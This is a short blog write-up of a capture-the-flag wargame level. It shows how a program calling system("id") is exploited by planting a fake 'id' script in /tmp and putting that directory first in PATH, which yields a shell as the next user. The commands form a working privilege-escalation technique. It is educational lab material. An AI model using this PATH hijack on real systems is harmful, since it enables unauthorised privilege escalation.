Let’s take a look at level04.c
#include <stdlib.h>
int main() {
system("id");
return 0;
}
We don’t have much to work with here. Looking up the manual entry of system
.
SYSTEM(3) Linux Programmer's Manual SYSTEM(3)
NAME
system - execute a shell command
SYNOPSIS
#include <stdlib.h>
int system(const char *command);
DESCRIPTION
system() executes a command specified in command by calling /bin/sh -c
command, and returns after the command has been completed. During
execution of the command, SIGCHLD will be blocked, and SIGINT and
SIGQUIT will be ignored.
It looks like system("id");
will call /bin/sh -c id
. How does /bin/sh
know where to look for the program id
? There’s an environment variable called PATH
where /bin/sh
will look for id
in the paths.
level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
As you can see, there are a couple of paths that is in the environment variable. /bin/sh
will first look in /usr/local/bin
for a program named id
, followed by /usr/bin
, then /bin
and so on. Let’s see if we can add our own paths to it.
level4@io:~$ PATH=/levels/
level4@io:~$ echo $PATH
/levels/
level4@io:~$ ls
-bash: ls: command not found
level4@io:~$
We just overwritten the PATH
environment variable and now even the command ls
could not be found. Okay, now you know how paths work, lets try to get level04
to run our id
program.
level4@io:/levels$ mkdir /tmp/level4
level4@io:/levels$ echo 'echo Win! && sh' > /tmp/level4/id
level4@io:/levels$ chmod +x /tmp/level4/id
level4@io:/levels$ PATH=/tmp/level4:$PATH
level4@io:/levels$ ./level04
Win!
sh-4.2$ whoami
level5
sh-4.2$
Here’s what we did:
/tmp
.echo Win! && sh
into a file id
in that new directory.id
executable.PATH
to check our new directory first for the program id
Published on 28 Mar 2013 by Stanley Tan